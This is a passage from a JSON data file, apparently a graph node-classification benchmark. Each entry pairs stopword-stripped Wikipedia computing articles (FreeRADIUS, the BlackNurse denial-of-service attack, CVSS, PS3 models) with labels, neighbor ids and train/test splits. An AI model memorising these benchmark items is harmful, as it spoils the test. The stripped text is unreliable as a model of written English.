      1240,
      2777,
      8923,
      8413,
      6367,
      737,
      4326,
      236,
      9970,
      3323,
      3836,
      8443,
      9987,
      5892,
      7943,
      7951,
      278,
      7965,
      10525,
      4901,
      1834,
      5431,
      11590,
      10057,
      11082,
      2893,
      3407,
      339,
      5483,
      4972,
      8557,
      6528,
      1409,
      3971,
      4995,
      3462,
      8584,
      5524,
      7572,
      10645,
      1435,
      2978,
      5026,
      1959,
      3499,
      944,
      5054,
      6086,
      11221,
      5078,
      11223,
      479,
      10722,
      5605,
      487,
      6632,
      8169,
      494,
      1520,
      7152,
      9712,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 4049,
    "label": 4,
    "text": "Rebecca_Bace:rebecca bace rebecca becky gurley bace 1955–2017 american computer security expert pioneer intrusion detection spent 12 years us national security agency created computer misuse anomaly detection cmad research program known den mother computer security also influential early stages intelligence community venture capital major player silicon valley investments cyber security technology bace grew rural alabama one seven children diagnosed epilepsy adolescence mother war bride japan following world war ii father self-educated teamster alabama due prevailing attitudes illness women neurologist suggested stay home collect disability following high school credited local librarian family friend bertha nel allen encouragement apply college scholarships scholarships charitable foundations set betty crocker jimmy hoffa senior year high school 1973 accepted university alabama birmingham woman engineering financial hardship frequent employment interruptions took eight years classes various schools earn degree bace first became interested computing freshman year working punch cards programming fortran cobol ibm mainframe got first engineering job teaching engineering lab approached couple xerox technicians needed fill affirmative action requirements accepted job specialist repairing copier machines experience stated faced significant gender racial bias sometimes customers would raise ruckus deal believed given second best showed even though better educated men graduation 1984 bace started working nsa searching flexible job allow care autistic son later diagnosed leukemia took assignment 1989 national computer security center ncsc chartered part nsa expressly deal computer security issues department defense intelligence community bace served program manager intrusion detection research specifically transferring research relatively new commercial security products market played pivotal role apprehension kevin mitnick proving trace back capture possible beyond theoretical context also provided seed funding computer security labs uc davis purdue university following death son bace went serve deputy security officer los alamos national laboratory computing information communications division left los alamos 1998 started infidel inc. security consulting company 2002 signed venture capital consultant trident capital silicon valley bace also briefly served technical vp cyber security practice in-q-tel investment arm us intelligence community death served chief strategist center forensics information technology security cfits university south alabama venture capitalist provided expert advice generation security startups including qualys sygate irobot arxan technologies hytrust neohapsis",
    "neighbors": [
      2437,
      7563,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      11182,
      10290,
      4789,
      7160,
      8635,
      830,
      2494,
      7107,
      7369,
      6475,
      10189,
      7887,
      4834,
      5475,
      7525,
      9319,
      1907,
      4087,
      3960,
      11642,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 4050,
    "label": 1,
    "text": "Roller_Coaster_DataBase:roller coaster database roller coaster database rcdb roller coaster amusement park database begun 1996 duane marden grown feature statistics photos 5000 roller coasters around world publications mentioned rcdb include new york times los angeles times toledo blade orlando sentinel time forbes mail guardian chicago sun-times rcdb started 1996 duane marden computer programmer brookfield wisconsin website run web servers marden basement location st. louis 2019 marden still operates site roller coaster entry includes following information ride current amusement park location type status existing standing operating sbno defunct opening date make/model cost capacity length height drop number inversions speed duration maximum vertical angle trains special notes entries may also feature reader-contributed photos and/or press releases site also categorizes rides special orders including list tallest coasters list fastest coaster list inversions coaster list parks inversions etc. sortable steel wooden roller coaster entry links back page lists park roller coasters past present includes brief history links fan web pages saluting park site available ten languages english german french spanish dutch portuguese italian swedish japanese simplified chinese",
    "neighbors": [
      225,
      2901,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 4051,
    "label": 2,
    "text": "List_of_Microsoft_operating_systems:list microsoft operating systems following list microsoft written published operating systems codenames microsoft gave operating systems see microsoft codenames another list versions microsoft windows see list microsoft windows versions releases windows windows 2000 part windows nt family",
    "neighbors": [
      636,
      641,
      8576,
      259,
      2179,
      4356,
      6150,
      6787,
      11524,
      6797,
      782,
      1935,
      1148,
      8976,
      10900,
      3477,
      3605,
      11030,
      3224,
      11549,
      5406,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      8098,
      10273,
      11559,
      1832,
      6441,
      7215,
      7983,
      3250,
      3890,
      11060,
      8757,
      1083,
      7359,
      321,
      194,
      4289,
      3527,
      9033,
      4170,
      10698,
      2380,
      6476,
      9166,
      10957,
      4816,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      5600,
      10338,
      740,
      2919,
      9448,
      8681,
      9194,
      9585,
      7796,
      6265,
      1916,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 4052,
    "label": 7,
    "text": "DIET:diet diet software grid-computing middleware diet sits operating system handles details hardware application software deals specific computational task hand diet created 2000 designed high-performance computing currently developed inria école normale supérieure de lyon cnrs claude bernard university lyon 1 sysfera open-source software released cecill license like netsolve/gridsolve ninf diet compliant gridrpc standard open grid forum aim diet project develop set tools build computational servers distributed resources managed transparent way middleware work workstations clusters grids clouds diet used manage décrypthon grid installed ibm six french universities bordeaux 1 lille 1 paris 6 ens lyon crihan rouen orsay usually gridrpc environments five different components clients submit problems servers servers solve problems sent clients database contains information software hardware resources scheduler chooses appropriate server depending problem sent information contained database monitors get information status computational resources diet architecture follows different design composed two approaches developed workflow management diet uses additional entity called dag entity work two modes one defines complete scheduling workflow ordering mapping one defines ordering workflow execution mapping done next step client using master agent find server workflow services run diet provides degree control scheduling subsystem via plug-in schedulers service request application arrives sed sed creates performance-estimation vector collection performance-estimation values pertinent scheduling process application values stored structure either values provided cori collectors resource information custom values generated sed design estimation vector subsystem modular cori generates basic set performance-estimation values stored estimation vector identified system-defined tags information number cores total memory number bogomips hard drive speed etc. static well dynamic information like predicted time solve problem given resource average cpu load thus transferred server daemon scheduler agent order provide pertinent information better scheduling mentioned used correlation application-driven scheduler possibility diet server daemon better understanding application needs request specific scheduling relaying information stored vector three different data managers integrated diet parallel resources generally accessible lrms local resource management system also called batch system diet provides interface several existing lrms execute jobs loadleveler ibm resources openpbs fork well-known pbs system oar batch scheduler used grid'5000 research grid developed imag grenoble submitted jobs parallel jobs coded using mpi standard instantiation mpich lam cloud extension diet created 2009 diet thus able access cloud resources two existing cloud providers",
    "neighbors": [
      8640,
      4194,
      5956,
      3562,
      5612,
      7983,
      9040,
      9301,
      3449,
      8122,
      3323,
      7935
    ],
    "mask": "None"
  },
  {
    "node_id": 4053,
    "label": 4,
    "text": "FreeRADIUS:freeradius freeradius modular high performance free radius suite developed distributed gnu general public license version 2 free download use freeradius suite includes radius server bsd-licensed radius client library pam library apache module numerous additional radius related utilities development libraries cases word freeradius refers free open-source radius server suite freeradius popular open source radius server widely deployed radius server world supports common authentication protocols server comes php-based web user administration tool called dialupadmin basis many commercial radius products services embedded systems radius appliances support network access control wimax supplies aaa needs many fortune-500 companies telcos tier 1 isps also widely used academic community including eduroam server fast feature-rich modular scalable freeradius started august 1999 alan dekok miquel van smoorenburg miquel previously written cistron radius server gained widespread usage livingston server longer maintained freeradius started create new radius server using modular design would encourage active community involvement november 2014 freeradius project three core team members alan dekok project leader arran cudbard-bell principal architect matthew newton latest major release freeradius 3 freeradius 3 includes support radius tls including radsec completely rewritten rlm_ldap module hundreds minor consistency usability enhancements latest mature version maintained stability rather features previous major release v2.2.x entered final phase lifecycle receive security fixes survey 2006 showed user base totals 100 million people modules included server core support ldap mysql postgresql oracle many databases supports popular eap authentication types including peap eap-ttls 100 vendor dictionaries included ensuring compatibility wide range nas devices version 2.0.0 added support virtual hosting ipv6 vmps new policy language simplifies many complex configurations",
    "neighbors": [
      8582,
      4999,
      5397,
      9640,
      7983,
      8644,
      10058,
      8539,
      10332,
      8670,
      5470,
      2143,
      10340,
      5093,
      9320,
      7022,
      5490,
      6651,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4054,
    "label": 4,
    "text": "BlackNurse:blacknurse blacknurse attack form denial service attack based icmp flooding attack special modest bandwidth 20mbit/s effective disrupting victim network attack consists sending destination unreachable packets destination works packets caused destination consume resources relatively high rate relative traffic attack first discovered researchers lenny hansson kenneth bjerregard jørgensen security operations center danish telecom operator tdc researchers goal protect customers telecom network ddos attacks cyber threats team noted release attack blacknurse attack attracted attention anti-ddos solution experienced even though traffic speed packets per second low attack could keep customers operations even applied customers large internet uplinks large enterprise firewalls place expected professional firewall equipment would able handle attack denial service typically accomplished flooding targeted machine resource superfluous requests attempt overload systems prevent legitimate requests fulfilled commonly attack done distributed manner many clients send requests given server sum client traffic often enough overwhelm destination cause service go offline become unavailable case blacknurse attack instead flooding remote system internet traffic superfluous traffic attack takes advantage imbalance resources required send traffic resources required process namely blacknurse attacks uses icmp type 3 code 3 packets packet meant sent destination port unreachable unlike previous attacks using icmp protocol -- smurf attack ping flood ping death -- blacknurse flood destination traffic instead researchers realized destination port unreachable packet causes high cpu usage firewall processes using relatively small bandwidth 15-18mbit/s attacker cause cpu usage spike target firewall causing firewall become unable process requests test device vulnerable send icmp packet network using following commands recommended run commands wan side firewall running test attempt use network normally watching cpu usage firewall history icmp attacks like smurf attack ping flood ping death many icmp packets commonly blocked firewalls however icmp packets necessary allow network work properly destination port unreachable one packets required typically however attack effective incoming traffic greater bandwidth victim machine case blacknurse however attack takes advantage processing logic many firewalls handling traffic attack important leverages necessary component internet traffic n't require use botnet execute attacks due low cost attack low bandwidth connections common attack used effectively original researchers soc tdc noted attack currently used clients network attack named blacknurse joke two principal researchers former blacksmith former nurse media picked name could changed",
    "neighbors": [
      8320,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      4883,
      10003,
      4117,
      8726,
      535,
      1688,
      10132,
      5402,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      8998,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      6735,
      3024,
      4304,
      6484,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      2409,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      2815
    ],
    "mask": "None"
  },
  {
    "node_id": 4055,
    "label": 1,
    "text": "Semi-structured_model:semi-structured model semi-structured model database model separation data schema amount structure used depends purpose advantages model following primary trade-off made using semi-structured database model queries made efficiently constrained structure relational model typically records semi-structured database stored unique ids referenced pointers location disk makes navigational path-based queries quite efficient searches many records typical sql efficient seek around disk following pointers object exchange model oem one standard express semi-structured data another way xml",
    "neighbors": [
      9828,
      10471,
      10413,
      242,
      9397,
      3509,
      4376,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4056,
    "label": 9,
    "text": "Wakanda_(software):wakanda software wakanda javascript platform develop run web mobile apps based open standards technologies including angularjs ionic node.js typescript supported linux deployment microsoft windows macos studio development wakanda consists stack tools technologies starting 2008 server wakanda first presented ajax experience 2009 year jsconf.eu private developer preview made accessible 2010 first version wakanda studio including model designer gui designer wakanda came public attention june 2011 new developer preview second public developer preview announced wakanday js.everywhere boston october 2011 conference first beta december 15th wakanda available live release version since march 15 2012 june 28 2012 first version wakanda officially launched october 26 2012 demonstrated js.everywhere conference us france first involved commonjs working group since 2009 team created client server javascript apis w3c community group april 2012 joining w3c october 2012 company wakanda sas created december 2014 december 7 2015 wakanda digital app factory officially launched 2016 wakanda named cool vendor gartner wakanda server supports commonjs modules web workers web storage xmlhttprequest html5 file api blobs timers implements firebug crossfire debugger protocol well webkit remote debugging protocol wakandadb nosql engine accessed via http inspired odata rest api integrates connectors interact tiers databases mysql microsoft sql server odbc wakanda supports node.js modules including eventemitter socket tls wakanda includes open source projects part default packages wakanda server built javascriptcore icu openssl zlib",
    "neighbors": [
      8201,
      6154,
      2062,
      2576,
      9245,
      6176,
      8739,
      5165,
      4171,
      595,
      84,
      603,
      8289,
      5219,
      102,
      3705,
      1146,
      6791,
      6797,
      148,
      8854,
      1698,
      4777,
      3761,
      1203,
      692,
      8883,
      190,
      1215,
      5311,
      7871,
      4822,
      8923,
      7396,
      10991,
      7412,
      259,
      9481,
      1802,
      10507,
      1812,
      11030,
      4378,
      6941,
      10526,
      7455,
      803,
      3876,
      7983,
      7987,
      11060,
      823,
      4920,
      2880,
      1353,
      11087,
      339,
      9560,
      9561,
      6493,
      8554,
      5483,
      9580,
      7022,
      10097,
      1920,
      1409,
      8068,
      3462,
      8582,
      9614,
      8605,
      5031,
      4529,
      438,
      5048,
      6074,
      1470,
      9152,
      9666,
      8644,
      5067,
      482,
      487,
      9195,
      5101,
      8691,
      10739,
      10744,
      11259,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 4057,
    "label": 9,
    "text": "Comparison_of_programming_languages_(string_functions):comparison programming languages string functions string functions used computer programming languages manipulate string query information string programming languages string datatype string functions although may low-level ways within language handle strings directly object-oriented languages string functions often implemented properties methods string objects functional list-based languages string represented list character codes therefore list-manipulation procedures could considered string functions however languages may implement subset explicit string-specific functions well function manipulate strings modern object-oriented languages like c java immutable strings return copy newly allocated dynamic memory others like c manipulate original string unless programmer copies data new string see example concatenation basic example string function codice_1 function function returns length string literal languages may string functions similar exactly syntax parameters outcomes example many languages length function usually represented len string list common functions aims help limit confusion string functions common many languages listed including different names used list common functions aims help programmers find equivalent function language note string concatenation regular expressions handled separate pages statements guillemets « … » optional var begin // example c ya hello world 2 // l' substr hello world 1 1 e' hello world .substr 1 1 e' hello world 2 l' hello world -3 r' example visual basic mid hello world ,2,1 example visual basic .net hello world .chars 2 l c example smalltalk 'hello world 2 e //example rust hello world .chars .nth 2 // l' hello cmp world returns -1 hello cmp world returns less world cmp hello returns hello cmp hello returns cmp hello world returns -1 /** example rexx */ compare hello world /* returns index mismatch 1 */ use-modules srfi srfi-13 string-compare hello world values values values example erlang hello world returns false art gt painting returns false art lt painting returns true hello -gt world returns false string art painting returns nil string art painting returns non nil 'abc 'def // returns abcdef // example c abc def // returns abcdef example visual basic abc def returns abcdef abc def returns abcdef abc null returns abc abc null returns null // example abc def // returns abcdef concatenate 'string abc def ghi returns abc def ghi abc def returns abcdef perl 5 returns perl 5 abc def returns abcdef perl 6 returns perl 6 ¢ example algol 68 ¢ // example c hello mate .contains e // returns true word .contains z // returns false good morning .contains z returns false ¡buenos días .contains í returns true e hello mate returns true z word returns false example smalltalk 'hello mate includessubstring e returns true 'word includessubstring z returns false tests two strings equal see also compare compare note equality checks via generic compare integer result confusing programmer often significantly expensive operation especially true using c-strings // example c hello == world // returns false example visual basic hello world returns false 'hello eq 'world returns 0 'hello eq 'hello returns 1 'hello eq 'world returns false 'hello eq 'hello returns true hello -eq world returns false ⍝ example apl 'hello ≡ 'world ⍝ returns 0 search e hello mate returns 1 search z word returns nil // examples c hello mate .indexof e // returns 1 hello mate .indexof e 4 // returns 9 word .indexof z // returns -1 hello .index e returns 1 hello .index z returns nil use-modules srfi srfi-13 string-contains hello mate e returns 1 string-contains word z returns f examples visual basic instr hello mate e returns 2 instr 5 hello mate e returns 10 instr word z returns 0 examples smalltalk 'hello mate indexofsubcollection 'ate returns 8 'hello mate indexofsubcollection 'late returns 0 i'hello mate 'hello mate // examples c hello mate .indexof e // returns 1 word .indexof z // returns -1 position \\e hello mate returns 1 position \\z word returns nil // example c string.format 0 costs 1 c2 pen 19.99 // returns pen costs 19.99 // example object pascal delphi format 'my costs 2f 'pen 19.99 // returns pen costs 19.99 // example java string.format costs 2f pen 19.99 // returns pen costs 19.99 sprintf costs .2f pen 19.99 returns pen costs 19.99 1.fmt 04d returns 0001 costs .2f pen 19.99 returns pen costs 19.99 0 costs 1 .2f .format pen 19.99 returns pen costs 19.99 format ~a costs ~1,2f pen 19.99 returns pen costs 19.99 tests two strings equal see also equality // example c hello world // returns true example visual basic hello world returns true not= hello world ⇒ true 'hello ne 'world returns 1 'hello ne 'world returns true hello -ne world returns true see find see find see find see rfind languages languages without built-in trim function usually simple create custom function accomplishes task awk one use regular expressions trim standard trim function c c++ available string libraries c contain code implements trimming functions significantly ease efficient implementation function also often called eatwhitespace non-standard c libraries c programmers often combine ltrim rtrim implement trim void rtrim char *str void ltrim char *str void trim char *str open source c++ library boost several trim variants including standard one trimmed boost :algorithm :trim_copy string note boost function named simply codice_3 input sequence modified in-place return result another open source c++ library qt several trim variants including standard one trimmed s.trimmed linux kernel also includes strip function codice_4 since 2.6.18-rc1 trims string place since 2.6.33-rc1 kernel uses codice_5 instead codice_4 avoid false warnings trim algorithm haskell may interpreted follows f drops preceding whitespace reverses string f applied output note type signature second line optional trim algorithm j functional description filter codice_7 non-space characters codice_8 leading codice_9 codice_10 trailing codice_11 spaces built-in trim function javascript 1.8.1 firefox 3.5 later ecmascript 5 standard earlier versions added string object prototype follows string.prototype.trim function perl 5 built-in trim function however functionality commonly achieved using regular expressions example string =~ s/^\\s+// remove leading whitespace string =~ s/\\s+ // remove trailing whitespace string =~ s/^\\s+|\\s+ //g remove leading trailing whitespace examples modify value original variable codice_12 also available perl stripltspace codice_13 cpan however two functions commonly used strip whitespace end strings codice_14 codice_15 perl 6 upcoming major revision language strings codice_3 method example string string.trim remove leading trailing whitespace string .= trim thing tcl codice_19 command three relevant subcommands codice_3 codice_21 codice_22 commands additional argument may specified string represents set characters remove—the default whitespace space tab newline carriage return example trimming vowels set string onomatopoeia set trimmed string trim string aeiou result nomatop set r_trimmed string trimright string aeiou result onomatop set l_trimmed string trimleft string aeiou result nomatopoeia xslt includes function codice_23 strips leading trailing whitespace addition replacing whitespace sequence including line breaks single space example xsl variable name='trimmed /xsl variable xslt 2.0 includes regular expressions providing another mechanism perform string trimming another xslt technique trimming utilize xpath 2.0 codice_24 function",
    "neighbors": [
      10752,
      515,
      3462,
      8582,
      9735,
      1931,
      2062,
      6414,
      6160,
      5521,
      10510,
      3736,
      1435,
      155,
      9245,
      11555,
      3876,
      5796,
      5031,
      4777,
      428,
      5165,
      5677,
      5806,
      9008,
      10413,
      692,
      3765,
      7732,
      7479,
      5048,
      7609,
      8502,
      10043,
      10684,
      6718,
      7486,
      6780,
      963,
      8644,
      8262,
      11132,
      5961,
      1610,
      1611,
      8524,
      8397,
      9804,
      847,
      7292,
      7889,
      10569,
      11212,
      3960,
      5588,
      7894,
      2519,
      11219,
      10586,
      11610,
      2652,
      10083,
      4069,
      10470,
      2281,
      7274,
      8554,
      2670,
      8303,
      6640,
      5492,
      502,
      1016,
      3577,
      3708,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4058,
    "label": 1,
    "text": "Simple_Features:simple features simple features officially simple feature access open geospatial consortium ogc international organization standardization iso standard iso 19125 specifies common storage access model mostly two-dimensional geometries point line polygon multi-point multi-line etc used geographic information systems iso 19125 standard comes two parts part one iso 19125-1 sfa-ca common architecture defines model two-dimensional simple features linear interpolation vertices data model defined sfa-ca hierarchy classes part also defines representation using well-known text binary part 2 standard iso 19125-2 sfa-sql defines implementation using sql opengis standard cover implementations corba ole/com well although lagged behind sql one standardized iso iso/iec 13249-3 sql/mm spatial extends simple features data model mainly circular interpolations e.g circular arcs adds features like coordinate transformations methods validating geometries well geography markup language support geometries also associated spatial reference systems standard also specifies attributes methods assertions geometries general 2d geometry simple contains self-intersection specification defines de-9im spatial predicates several spatial operators used generate new geometries existing geometries part 2 simple feature access implemented varying degrees gdal library implements simple features data model ogr component java-based deegree framework implements sfa part 1 various ogc standards geosparql ogc standard intended allow geospatially-linked data representation querying based rdf sparql defining ontology geospatial reasoning supporting small simple features well de-9im rcc8 rdfs/owl vocabulary gml wkt literals 2012 various nosql databases limited support anything complex bounding box proximity search",
    "neighbors": [
      11651,
      10511,
      8854,
      11030,
      11036,
      5149,
      2206,
      9245,
      5413,
      9893,
      5546,
      5677,
      10029,
      10413,
      11056,
      53,
      3126,
      1079,
      5816,
      10238,
      2556,
      6977,
      6850,
      3907,
      580,
      8904,
      5833,
      1610,
      8524,
      2904,
      8539,
      4064,
      6629,
      8421,
      8426,
      5614,
      7022,
      1010,
      3447,
      4604,
      2045,
      3454
    ],
    "mask": "Test"
  },
  {
    "node_id": 4059,
    "label": 8,
    "text": "HTTP_File_Server:http file server http file server otherwise known hfs free web server specifically designed publishing sharing files complete feature set differs web servers lacks common features like cgi even ability run windows service includes example counting file downloads even advised using ordinary web server hfs small http file server aimed mostly sharing files download official documentation describes hfs hfs http file server file sharing software allows send receive files limit sharing friends open whole world hfs different classic file sharing network hfs web server uses web technology compatible today internet since actually web server friends download files downloading website using web browser internet explorer firefox users n't install new software hfs lets share files web servers used publish website hfs designed however free use way wish risk latest beta version 2.3 hfs includes proprietary scripting language known macros used expand functionality program scripts used variety methods including event handlers directly web pages macros even written bypass program account system custom one hfs used typical web-server however easy support requires variety unconventional programming methods version 2.3 due lack support php cgi development started august 2002 reached version 1.0 september year hfs multiple security issues past states website 2013 current known security bugs latest version hfs open source anyone able easily check security flaws many expert users although designed extremely robust hfs stable used months without restart used stunnel provide https ssl/tls",
    "neighbors": [
      1632,
      225,
      9580,
      7983,
      2485,
      4284
    ],
    "mask": "None"
  },
  {
    "node_id": 4060,
    "label": 3,
    "text": "PlayStation_3_models:playstation 3 models playstation 3 video game console produced various models life cycle launch playstation 3 available either 20 40 60 80 gb hard disk drive us japan priced us 499 us 599 either 40 60 80 gb hard disk drive europe priced £299 £425 since sony released two redesigned models slim super slim models total number consoles sold estimated 77 million several original playstation 3 hardware models commonly referred size included hard disk drive 20 40 60 80 160 gb although referred hdd size capabilities consoles vary region release date difference appearance first five models color trim number usb ports presence absence door covers flash card readers equipped models minor changes air vents retail packages include one two sixaxis controllers dualshock 3 controller beginning june 12 2008 one type-a mini-b usb cable connecting controller playstation portable system one composite video/stereo audio output cable one ethernet cable 20 60 cechexx 80 gb one power cable models support software emulation original playstation support playstation 2 backward compatibility diminished later compatible models last model integrated backward compatibility ntsc 80 gb ceche metal gear solid 4 bundle compatibility issues games systems detailed public database hosted manufacturer models excluding 20 gb model include 802.11 b/g wi-fi addition features 20 gb model 60 gb model internal ieee 802.11 b/g wi-fi multiple flash card readers sd/multimedia card compactflash type i/type ii microdrive memory stick/pro/duo chrome colored trim terms hardware 80 gb model ceche released south korea identical 60 gb model cechc released pal regions except difference hard drive size european 60gb model cechc south korean north american ceche 80gb model excludes playstation 2 emotion engine cpu chip replaced emulated version via cell broadband engine however retains graphics synthesizer gpu resulting hybrid hardware software emulation due elimination emotion engine replacement software-emulated version level playstation 2 compatibility slightly reduced 40 gb 80 gb cechl cechm cechk 160 gb models two usb ports instead four usb ports models include multiple flash card readers sacd support backward compatibility playstation 2 games due removal graphics synthesizer gpu stripped units playstation 2 based hardware official wi-fi flash memory card readers ever released sony 20 gb system although sony plans september 2009 sony placed emphasis proposed add-ons nevertheless model features four usb 2.0 ports wireless networking flash memory card support already obtained use widely available external usb adapters third-party ps3-specific media hubs rumored cell processors third-generation ps3s 40 gb 2008 80 gb cechl cechm cechk 160 gb would move 90 nm process newer 65 nm process scei ceo kaz hirai later confirmed later 45 nm change lowers power consumption console makes less expensive produce redesigned version playstation 3 commonly referred ps3 slim officially branded ps3 features upgradeable 120 gb 160 gb 250 gb 320 gb hard drive 33 smaller 36 lighter consumes 34 cech-20xx 45 cech-21xx less power previous model one third original ps3 model cell microprocessor moved 45 nm manufacturing process lets run cooler quieter previous models cooling system redesigned rsx moved 40 nm process latest revision ps3 slim also includes support cec commonly referred manufacturer brandings braviasync viera link easylink etc allows control console hdmi using tv remote control ps3 slim longer main power switch like previous ps3 models similar redesigned slimline playstation 2 support emulation play ps2 titles present slim version however shortly release ps3 slim sony announced new series ps2 remasters called classics hd ps2 psp titles remastered hd ps3 trophies sometimes playstation move compatibility added october 2011 ps2 classics available purchase playstation store ps3 slim officially released september 1 2009 north america europe september 3 2009 japan australia new zealand however retailers amazon.com best buy gamestop started sell ps3 slim august 25 2009 ps3 slim sold excess million units first 3 weeks sale 250 gb final fantasy xiii -themed ps3 slim white color pink designs officially announced september 24 2009 tokyo game show part bundle japan final fantasy xiii initially revealed u.s. federal communications commission fcc filings ps3 cech-2000b sony computer entertainment australia also announced later day would bringing 250 gb ps3 slim australia would bundled games feature final fantasy xiii theme although north american bundles announced 250 gb ps3 slim sold stand-alone console north america july 2010 sony announced two new sizes slim ps3 160 gb 320 gb 120 gb model discontinued japan launched july 29 2010 japan 160 gb version available classic white well standard charcoal black black 160 gb version also made available bundle japan-only dvr accessory torne later announced new sizes launched regions 160 gb model available august 2010 north america october 2010 europe 320 gb model available north america part bundle playstation move playstation eye copy sports champions europe playstation move playstation eye demo disc bundles released september 19 2010 september 15 2010 respectively coincide launch playstation move september 2012 sony announced new slimmer ps3 redesign cech-4000 due released late 2012 would available either 250 gb 500 gb hard drive pal regions 250 gb model available model 12 gb flash memory cech-4000a available place standalone 250 gb hard drive cech-zhd1 available upgrade model uk 500 gb model released september 28 2012 12 gb model made available october 12 2012 cech-4000b consoles hard drives weigh approximately cech-4000a weighs approximately roughly 25 smaller 20 lighter original ps3 slim version sliding disc cover rather slot-loading drive found previous playstation 3 consoles similar sony bravia kdl22px300 includes built playstation 2 cech-4200 model nearly identical hardware cech-4000 model introduced 2013 follow aacs rule inhibiting analog component composite output blu-ray disc content effective since 2014 previous 3000 4000 models output limit already set 480i meet jan 1st 2011 deadline agreement also aforementioned aacs vertical stand cech-zst1j also available models launched day consoles respective regions",
    "neighbors": [
      9472,
      4098,
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      823,
      6072,
      1985,
      1091,
      9543,
      10056,
      6909,
      6732,
      10316,
      3025,
      6738,
      6873,
      859,
      1501,
      607,
      9445,
      359,
      8937,
      4587,
      3824,
      5746,
      6004,
      7028,
      1784,
      7801,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4061,
    "label": 5,
    "text": "EchoLink:echolink echolink computer-based amateur radio system distributed free charge allows radio amateurs communicate amateur radio operators using voice ip voip technology internet least part path designed jonathan taylor radio amateur call sign k1rfd system allows reliable worldwide connections made radio amateurs greatly enhancing amateur radio communications capabilities essence voip applications skype unique addition ability link amateur radio station transceiver thus low-power handheld amateur radio transceiver contact local echolink node node active echolink station transceiver attached use internet connection station send transmission via voip active echolink node worldwide special hardware software required relay transmission via echolink node using system necessary prospective user callsign validated echolink system requires new user provide positive proof license identity callsign added list validated users cost service ensures system used licensed amateur radio operators software written run 32-bit 64-bit versions microsoft windows another edition software runs apple mobile devices iphone ipod touch ipad available apple app store android version available google play several android app repositories radio amateurs using echolink software operate one two modes radio amateurs without echolink software computer connected internet take advantage echolink network within radio range sysop mode echolink station also possible link sysop mode echolink station local repeater enhancing communication possibilities editions echolink also available two major smartphone platforms february 2010 edition echolink released apple iphone ipad ipod touch app store august 2010 edition echolink released android platform available google play store ios android editions created jonathan taylor k1rfd author original windows edition open source software packages largely compatible echolink available macintosh echomac echoham linux echolinux svxlink/qtel sysop mode required svxlink server linux good alternative features go beyond original software openness makes quite easy extend new functionality echoirlp software add irlp enables irlp node operate sysop mode echolink station echolink software designed run microsoft windows also known work several linux builds well loaded wine",
    "neighbors": [
      1632,
      1346,
      3140,
      9732,
      6539,
      6797,
      6993,
      823,
      1083
    ],
    "mask": "Train"
  },
  {
    "node_id": 4062,
    "label": 4,
    "text": "Common_Vulnerability_Scoring_System:common vulnerability scoring system common vulnerability scoring system cvss free open industry standard assessing severity computer system security vulnerabilities cvss attempts assign severity scores vulnerabilities allowing responders prioritize responses resources according threat scores calculated based formula depends several metrics approximate ease exploit impact exploit scores range 0 10 10 severe many utilize cvss base score determining severity temporal environmental scores also exist factor availability mitigations widespread vulnerable systems within organization respectively current version cvss cvssv3.0 released june 2015 research national infrastructure advisory council niac 2003/2004 led launch cvss version 1 cvssv1 february 2005 goal designed provide open universally standard severity ratings software vulnerabilities initial draft subject peer review review organizations april 2005 niac selected forum incident response security teams first become custodian cvss future development feedback vendors utilizing cvssv1 production suggested significant issues initial draft cvss work cvss version 2 cvssv2 began april 2005 final specification launched june 2007 feedback resulted work beginning cvss version 3 2012 ending cvssv3.0 released june 2015 cvss assessment measures three areas concern numerical score generated metric groups vector string simply vector cvssv2 represents values metrics block text complete documentation cvssv2 available first summary provided access vector av shows vulnerability may exploited attack complexity ac metric describes easy difficult exploit discovered vulnerability authentication au metric describes number times attacker must authenticate target exploit include example authentication network order gain access locally exploitable vulnerabilities value set single multiple authentication required initial access confidentiality c metric describes impact confidentiality data processed system integrity metric describes impact integrity exploited system availability metric describes impact availability target system attacks consume network bandwidth processor cycles memory resources affect availability system six metrics used calculate exploitability impact sub-scores vulnerability sub-scores used calculate overall base score formula_1 formula_2 formula_3 formula_4 metrics concatenated produce cvss vector vulnerability buffer overflow vulnerability affects web server software allows remote user gain partial control system including ability cause shut would give exploitability sub-score 10 impact sub-score 8.5 giving overall base score 9.0 vector base score case would av n/ac l/au n/c p/i p/a c. score vector normally presented together allow recipient fully understand nature vulnerability calculate environmental score necessary value temporal metrics change lifetime vulnerability exploits developed disclosed automated mitigations fixes made available exploitability e metric describes current state exploitation techniques automated exploitation code remediation level rl vulnerability allows temporal score vulnerability decrease mitigations official fixes made available report confidence rc vulnerability measures level confidence existence vulnerability also credibility technical details vulnerability three metrics used conjunction base score already calculated produce temporal score vulnerability associated vector formula used calculate temporal score temporalscore round_to_1_decimal basescore*exploitability*remediationlevel*reportconfidence continue example vendor first informed vulnerability posting proof-of-concept code mailing list initial temporal score would calculated using values shown would give temporal score 7.3 temporal vector e p/rl u/rc uc full vector av n/ac l/au n/c p/i p/a c/e p/rl u/rc uc vendor confirms vulnerability score rises 8.1 temporal vector e p/rl u/rc c temporary fix vendor would reduce score back 7.3 e p/rl t/rc c official fix would reduce 7.0 e p/rl o/rc c possible confident every affected system fixed patched temporal score reduce certain level based vendor actions may increase automated exploit vulnerability developed environmental metrics use base current 